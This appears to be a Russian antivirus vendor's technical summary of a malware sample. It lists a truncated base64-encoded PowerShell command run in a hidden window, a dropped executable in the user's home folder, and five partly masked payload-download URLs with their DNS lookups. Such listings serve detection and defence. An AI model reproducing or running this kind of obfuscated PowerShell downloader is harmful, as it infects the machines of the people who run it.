Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFkAUABLAFYAZQBrAHUAPQAnAEUASwBWAEcARQBlAG0AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAHUAYABSAGkAdABZAFAAYABSAG8AdABvAGAAQwBPAGwAIgAgAD...
- %HOMEPATH%\316.exe
- %HOMEPATH%\316.exe
- http://an###ortega.com/erros/nt_ozq2y_k6s88xxcau/
- http://to##.#lvrdev.com/admin/mt2f7_7pd0u_1bhbba/
- http://ze####ngerapp.com/kzbst/p_3_lqo8eaj/
- http://to##.#yportalx.com/cgi-bin/b_1_b5ce/
- http://il####steeleng.com/ghp3wu/27yja_wwgc8_570/
- DNS ASK an###ortega.com
- DNS ASK to##.#lvrdev.com
- DNS ASK ze####ngerapp.com
- DNS ASK to##.#yportalx.com
- DNS ASK il####steeleng.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFkAUABLAFYAZQBrAHUAPQAnAEUASwBWAEcARQBlAG0AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAHUAYABSAGkAdABZAFAAYABSAG8AdABvAGAAQwBPAGwAIgAgAD...' (со скрытым окном)